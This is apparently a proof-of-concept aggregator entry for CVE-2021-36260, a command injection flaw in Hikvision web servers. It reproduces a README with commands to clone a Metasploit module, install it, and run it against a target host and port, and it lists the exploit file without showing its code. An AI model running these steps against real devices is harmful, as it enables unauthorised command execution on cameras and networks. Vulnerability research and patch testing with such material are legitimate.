CVE-2021-36260 PoC — Hikvision Web Server 操作系统命令注入漏洞

Source

Associated Vulnerability

Description

the metasploit script(POC) about CVE-2021-36260 

Readme

# CVE-2021-36260-metasploit
the metasploit script(POC) about CVE-2021-36260. A command injection vulnerability in the web server of some Hikvision product, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.

# preparation POC
```cmd
git clone https://github.com/TaroballzChen/CVE-2021-36260-metasploit
cd CVE-2021-36260-metasploit
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp hikvision_web_server_build_210702_command_injection.py ~/.msf4/modules/auxiliary/scanner/http/
chmod +x ~/.msf4/modules/auxiliary/scanner/http/hikvision_web_server_build_210702_command_injection.py
msfconsole
```

# POC usage
```text
set rhost <vuln ip/host>
set port <vuln port>
set ssl <default: false for http>
exploit
```

# result
![poc](poc.png)

# reference
- https://www.exploit-db.com/exploits/50441

File Snapshot

 [4.0K]  /data/pocs/bf096878ec8b2531bea23156888779db5f1fd54c
├── [7.5K]  hikvision_web_server_build_210702_command_injection.py
├── [542K]  poc.png
└── [ 865]  README.md

0 directories, 3 files

Remarks